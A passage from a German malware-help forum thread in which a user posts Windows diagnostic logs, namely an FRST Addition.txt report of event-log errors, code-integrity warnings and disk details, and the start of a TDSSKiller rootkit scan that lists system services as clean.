Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.
Vorgang:
Generatordaten werden gesammelt
Kontext:
Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
Generatorname: System Writer
Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}
Error: (05/21/2017 12:27:16 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/21/2017 12:24:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xbd0
Startzeit der fehlerhaften Anwendung: 0x01d2d21c6c50fef8
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: f582f64c-3373-478a-a15b-f929adac582c
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/20/2017 08:03:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xde4
Startzeit der fehlerhaften Anwendung: 0x01d2d1935ab86bd9
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: bce9150f-3248-4ead-8318-8150d1bf8130
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/20/2017 02:27:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x203c
Startzeit der fehlerhaften Anwendung: 0x01d2d16481b9cf5d
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 4df17c98-057f-4230-b052-4a764dc63e50
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/20/2017 10:19:14 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".
Error: (05/20/2017 10:16:45 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xe7c
Startzeit der fehlerhaften Anwendung: 0x01d2d141696bf18e
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 9853c85f-3fc8-4b95-b23c-2a10b9d919d4
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/19/2017 03:30:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0xe04
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3e937c3db
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: 55771ade-ec8b-4200-84b1-9a5029b17a41
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (05/19/2017 03:29:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511
Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000018da1b
ID des fehlerhaften Prozesses: 0x2788
Startzeit der fehlerhaften Anwendung: 0x01d2d0a3bfd8df47
Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe
Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll
Berichtskennung: e7f89512-ad7c-48f5-9beb-8270e1eacebe
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Systemfehler:
=============
Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/21/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (05/21/2017 08:55:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (05/21/2017 08:55:17 PM) (Source: DCOM) (EventID: 10010) (User: ***)
Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.
Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (05/20/2017 02:27:55 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
CodeIntegrity:
===================================
Date: 2017-05-21 20:59:59.585
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 20:59:59.549
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 20:55:53.503
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-21 20:48:35.581
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 17:35:59.505
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf32.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 14:50:07.831
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 14:50:07.798
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-21 12:28:31.255
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-05-21 01:33:57.070
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
Date: 2017-05-20 20:19:32.035
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5675.46 MB
Summe virtueller Speicher: 14527.12 MB
Verfügbarer virtueller Speicher: 11620.5 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:237.69 GB) (Free:147.43 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620.58 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
|
|
21.05.2017, 20:29
| #9 |
| | Trojaner, Adware oder sonstiges ?Code:
ATTFilter
21:26:49.0660 0x2380 TDSS rootkit removing tool 3.1.0.15 Apr 18 2017 11:34:02
21:26:52.0765 0x2380 ============================================================
21:26:52.0765 0x2380 Current date / time: 2017/05/21 21:26:52.0765
21:26:52.0765 0x2380 SystemInfo:
21:26:52.0766 0x2380
21:26:52.0766 0x2380 OS Version: 10.0.15063 ServicePack: 0.0
21:26:52.0766 0x2380 Product type: Workstation
21:26:52.0766 0x2380 ComputerName: WELTZ
21:26:52.0767 0x2380 UserName: Dino
21:26:52.0767 0x2380 Windows directory: C:\WINDOWS
21:26:52.0767 0x2380 System windows directory: C:\WINDOWS
21:26:52.0767 0x2380 Running under WOW64
21:26:52.0767 0x2380 Processor architecture: Intel x64
21:26:52.0767 0x2380 Number of processors: 8
21:26:52.0767 0x2380 Page size: 0x1000
21:26:52.0767 0x2380 Boot type: Normal boot
21:26:52.0767 0x2380 CodeIntegrityOptions = 0x00000001
21:26:52.0767 0x2380 ============================================================
21:26:52.0850 0x2380 KLMD registered as C:\WINDOWS\system32\drivers\26266876.sys
21:26:52.0850 0x2380 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 15063.0, osProperties = 0x19
21:26:52.0984 0x2380 System UUID: {125CD7E0-CE60-5CA6-C788-ADA075B3A158}
21:26:53.0216 0x2380 Drive \Device\Harddisk0\DR0 - Size: 0x3B9E656000 ( 238.47 Gb ), SectorSize: 0x200, Cylinders: 0x799A, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:26:53.0217 0x2380 Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:26:53.0219 0x2380 ============================================================
21:26:53.0220 0x2380 \Device\Harddisk0\DR0:
21:26:53.0220 0x2380 MBR partitions:
21:26:53.0220 0x2380 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xAF000
21:26:53.0220 0x2380 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0xAF800, BlocksNum 0x1DB62000
21:26:53.0220 0x2380 \Device\Harddisk1\DR1:
21:26:53.0410 0x2380 MBR partitions:
21:26:53.0410 0x2380 \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
21:26:53.0410 0x2380 ============================================================
21:26:53.0413 0x2380 C: <-> \Device\Harddisk0\DR0\Partition2
21:26:53.0416 0x2380 D: <-> \Device\Harddisk1\DR1\Partition1
21:26:53.0416 0x2380 ============================================================
21:26:53.0416 0x2380 Initialize success
21:26:53.0416 0x2380 ============================================================
21:26:59.0184 0x0ce4 ============================================================
21:26:59.0184 0x0ce4 Scan started
21:26:59.0184 0x0ce4 Mode: Manual; SigCheck; TDLFS;
21:26:59.0184 0x0ce4 ============================================================
21:26:59.0184 0x0ce4 KSN ping started
21:26:59.0492 0x0ce4 KSN ping finished: true
21:27:00.0117 0x0ce4 ================ Scan system memory ========================
21:27:00.0117 0x0ce4 System memory - ok
21:27:00.0117 0x0ce4 ================ Scan services =============================
21:27:00.0141 0x0ce4 [ AAB860A5E606B9621E130D8C29D3F305, 93466620433B27F3BCFECDA26DD420AD1E5219034BA3B4E930EDED6D6728AE5C ] 1394ohci C:\WINDOWS\System32\drivers\1394ohci.sys
21:27:00.0169 0x0ce4 1394ohci - ok
21:27:00.0180 0x0ce4 [ 4140B14929C555E9513D59A2EEB5C471, 39A8400B3AA7FB1D8EBE87E65F89881AB23B6AE911BECAEC1FD86C7DADD4F1AA ] 3ware C:\WINDOWS\system32\drivers\3ware.sys
21:27:00.0188 0x0ce4 3ware - ok
21:27:00.0200 0x0ce4 [ D3DB4E3C096EFF74FB6E73E37CB66DD7, 451BE72D50D2316690910B86ACA1EBB5C0F3FE688BAB806EC94BCCB6F3798A0A ] ACPI C:\WINDOWS\system32\drivers\ACPI.sys
21:27:00.0218 0x0ce4 ACPI - ok
21:27:00.0221 0x0ce4 [ 3E5E5DAE5CAEC0209C93D3AD8128D8A0, 5CFA4D715AE8D928EA11F213C5A7B0B1C1705D2A8FF041E0A1988E645E669C54 ] AcpiDev C:\WINDOWS\System32\drivers\AcpiDev.sys
21:27:00.0229 0x0ce4 AcpiDev - ok
21:27:00.0233 0x0ce4 [ F72D7CC7E7A97A09757313F3B4C7E17A, 36E3363380C51A2DB58D3177655A0A75DAA977C00C5A9C60A189068C0AFDC643 ] acpiex C:\WINDOWS\system32\Drivers\acpiex.sys
21:27:00.0241 0x0ce4 acpiex - ok
21:27:00.0244 0x0ce4 [ F04B6F53FBDB2B6B0451AE53DE19F0C9, 41A8C314A46867BAA45CD9666AAF734AD45B74E2033A8E66D93E17CDDAD66578 ] acpipagr C:\WINDOWS\System32\drivers\acpipagr.sys
21:27:00.0251 0x0ce4 acpipagr - ok
21:27:00.0253 0x0ce4 [ C347A6095F3BE417D24F1E1349F4AF0F, 72C9D759BB132985AF55860658DC01F08590A2BD7E976FCF25E1314C5AA1D37B ] AcpiPmi C:\WINDOWS\System32\drivers\acpipmi.sys
21:27:00.0260 0x0ce4 AcpiPmi - ok
21:27:00.0263 0x0ce4 [ 686BFFC47454DD2F58795C2EE891CA9F, 6CC4B6679914742D700A8373DED2DD9A821CA5284D4D73493BA0855DB8E6520A ] acpitime C:\WINDOWS\System32\drivers\acpitime.sys
21:27:00.0270 0x0ce4 acpitime - ok
21:27:00.0284 0x0ce4 [ E6A1D864EC90F4397DF5AB2633B34DD4, 05F1B7291EBDD9CA1D74649C0DAFCBE5F2CF93E92C5CA16A8AC10B6DF83101A0 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
21:27:00.0293 0x0ce4 AdobeFlashPlayerUpdateSvc - ok
21:27:00.0312 0x0ce4 [ FBDA59118E59B3722248C66BAD89CAA9, 11AB83499757E3143834348DE39E85D56EC853071C96337C3ADD8A1E374C6CBC ] ADP80XX C:\WINDOWS\system32\drivers\ADP80XX.SYS
21:27:00.0335 0x0ce4 ADP80XX - ok
21:27:00.0348 0x0ce4 [ AC1928C2F7505BD556C552F153B062AB, B48EA30F76DEA57868CA74CC775DD60257021A3DE10CE101B8BEFA1CE9D22CF4 ] AFD C:\WINDOWS\system32\drivers\afd.sys
21:27:00.0363 0x0ce4 AFD - ok
21:27:00.0369 0x0ce4 [ 1D914C996F2C3134E2344BB74F79BCF6, D27AF01BA29784555AF7D2E89A3A65E81D6AFE1D3C7E8F9367F06D9DF5F88069 ] ahcache C:\WINDOWS\system32\DRIVERS\ahcache.sys
21:27:00.0381 0x0ce4 ahcache - ok
21:27:00.0384 0x0ce4 [ 41856B40EE15F96DEC8755AB01FA3CF7, 33C3C899AF9CA15BE5A4CF097FF43DF3F0DBA0E48B6F1E28AE3E76AD76A1C361 ] AJRouter C:\WINDOWS\System32\AJRouter.dll
21:27:00.0392 0x0ce4 AJRouter - ok
21:27:00.0396 0x0ce4 [ F485CA5559DB37A4882467A4F7D58BEA, A1C648EFE12A5A3356BC0949372ADD0FF0CA2F5A8F992EB71C87E9C0D5C92BB2 ] ALG C:\WINDOWS\System32\alg.exe
21:27:00.0404 0x0ce4 ALG - ok
21:27:00.0414 0x0ce4 [ D3E9EEDC0128DD1FB9E45D85E7E21F0B, 73853DC77CCE335F1571DB31C6F7E97D71625DC6226089E8281F62020F58CB8F ] AMD External Events Utility C:\WINDOWS\system32\atiesrxx.exe
21:27:00.0432 0x0ce4 AMD External Events Utility - ok
21:27:00.0440 0x0ce4 [ 08E3B9567A6FDD17A69956BA80F1E2D6, 179C4A09E51A41289C1AA11E778EB09E877A7F45FB5D54216F58D3EAF1FA88C4 ] amdacpksd C:\WINDOWS\system32\drivers\amdacpksd.sys
21:27:00.0450 0x0ce4 amdacpksd - ok
21:27:00.0455 0x0ce4 [ 9C39FBA94FFEF04561D13ED0D1B50DD0, 53FA118DEF37F0BA6030B9CB4C17019E6B5934941514756D66143B7BB66D7CA1 ] AmdK8 C:\WINDOWS\System32\drivers\amdk8.sys
21:27:00.0465 0x0ce4 AmdK8 - ok
21:27:00.0469 0x0ce4 [ 275B6F698CBEC36C42D3ABD7EE049BA1, C6CE3514947F67410B34E8973C87996A14FF485A2E5C7E5BA4FE276FB893D51C ] amdkmafd C:\WINDOWS\system32\drivers\amdkmafd.sys
21:27:00.0476 0x0ce4 amdkmafd - ok
21:27:00.0486 0x0ce4 amdkmdag - ok
21:27:00.0495 0x0ce4 [ 0E2B0B8C871A4BDA103B857E07CAC833, 80A3DB55FEBD3C6FEC0C6078D998F2B3A802425569F57ABCB2AF0D5C37D4A280 ] amdkmdap C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys
21:27:00.0509 0x0ce4 amdkmdap - ok
21:27:00.0514 0x0ce4 [ 395D56FA2E22A10AE4774440D086F559, 24D7CBE9B82DC8900D9A5E345347FEC330D47FDBD1517A2AC10218BA2A9DFAA9 ] AmdPPM C:\WINDOWS\System32\drivers\amdppm.sys
21:27:00.0524 0x0ce4 AmdPPM - ok
21:27:00.0528 0x0ce4 [ EB729A9ADCB9F9C406B533F95E2F67D4, EDCB8E39C503FF30ECB82F368242179E2788C12B4FD9B557F38380A934E7D8E7 ] amdsata C:\WINDOWS\system32\drivers\amdsata.sys
21:27:00.0534 0x0ce4 amdsata - ok
21:27:00.0541 0x0ce4 [ 3B5C5C696F33FE61F1922533B03B9316, C9BAAA9B02547C66A276A31958DFD2A289C5963A4EE3FF306535565240D816CC ] amdsbs C:\WINDOWS\system32\drivers\amdsbs.sys
21:27:00.0550 0x0ce4 amdsbs - ok
21:27:00.0553 0x0ce4 [ A7D45A303FF8A9493C96C4B804051E6E, 6074C264876A398039D3F89905A486ABA5BDACA038B79920A34323B38CFCB358 ] amdxata C:\WINDOWS\system32\drivers\amdxata.sys
21:27:00.0559 0x0ce4 amdxata - ok
21:27:00.0564 0x0ce4 [ 5180537517C27375B1F2CB37ED599FAF, 121BF0E3BDE068CC1E1E9B24DC334BA29348725E9BFB790699E4CC66664A4C3D ] AppID C:\WINDOWS\system32\drivers\appid.sys
21:27:00.0573 0x0ce4 AppID - ok
21:27:00.0577 0x0ce4 [ F7FEBF66A705F18DC063DFD259F15102, 394DA8A7355573C4D81C375450DF5C5B2FA6360E246B06FDE8E7F9ADF21360FA ] AppIDSvc C:\WINDOWS\System32\appidsvc.dll
21:27:00.0587 0x0ce4 AppIDSvc - ok
21:27:00.0591 0x0ce4 [ 13D7FEA71091D1EAD8ADDD10BFFEA06D, A707CAC76CBF0334E2FCE3220147B382F5E44DEF9E23DD459CF7C40F27771695 ] Appinfo C:\WINDOWS\System32\appinfo.dll
21:27:00.0602 0x0ce4 Appinfo - ok
21:27:00.0605 0x0ce4 [ EAF36A714E16A69B8B4ED7591CBA77B6, 11FE2A5D991FB8AF78F4E78FB6DF02005EC5404DC298FE2D4E7774BB0011AB52 ] applockerfltr C:\WINDOWS\system32\drivers\applockerfltr.sys
21:27:00.0618 0x0ce4 applockerfltr - ok
21:27:00.0623 0x0ce4 [ 290469FC9FDE400248DA3E528E729BC2, D9ABBEB76673D136698AA2F53C8EB1EAFBBDE365ACCA9AE348523B346143CA9C ] AppMgmt C:\WINDOWS\System32\appmgmts.dll
21:27:00.0634 0x0ce4 AppMgmt - ok
21:27:00.0645 0x0ce4 [ 82432C4D8E83A94C7644A61697113B4A, 97105B0089A1E02484B202AC58610A5DCFFF6F64402B67F9E8B6FF3A0FDB6E26 ] AppReadiness C:\WINDOWS\system32\AppReadiness.dll
21:27:00.0664 0x0ce4 AppReadiness - ok
21:27:00.0678 0x0ce4 [ B4F1CF9D0BE52DB8883655C469AAF521, D907B0838E70EBF5D55F00A87222CABE8904FEB8483F4F8168157F27A4EDB6EE ] AppVClient C:\WINDOWS\system32\AppVClient.exe
21:27:00.0697 0x0ce4 AppVClient - ok
21:27:00.0702 0x0ce4 [ 2D2DF2463FACFBF2FEE39DCCDF49D1B5, F083C1B5B2284AB818431ECC6C9A61EBAFA241840727B97DD0E3B4FF0CBD07C5 ] AppvStrm C:\WINDOWS\system32\drivers\AppvStrm.sys
21:27:00.0709 0x0ce4 AppvStrm - ok
21:27:00.0714 0x0ce4 [ B86E646CE67FE9D75C0D762B19B465FC, B50C45A06AC6862DB4B183F567D55AE289EB05E6A1B32CC3AEBB6163C4296D79 ] AppvVemgr C:\WINDOWS\system32\drivers\AppvVemgr.sys
21:27:00.0722 0x0ce4 AppvVemgr - ok
21:27:00.0727 0x0ce4 [ 2207D2A001A3C30B825F191CD2A76C91, A43EA8CB9E2D1A1FB2DDC738827514588BFFA420A2D618DBCA55614BE2E3B45D ] AppvVfs C:\WINDOWS\system32\drivers\AppvVfs.sys
21:27:00.0735 0x0ce4 AppvVfs - ok
21:27:00.0774 0x0ce4 [ EAE1B6D86D661BFC494A3975583F722C, 9F6C4254B62299DAE712B9B6447CF5F6D69B529FE736427D79C2327F5B022670 ] AppXSvc C:\WINDOWS\system32\appxdeploymentserver.dll
21:27:00.0838 0x0ce4 AppXSvc - ok
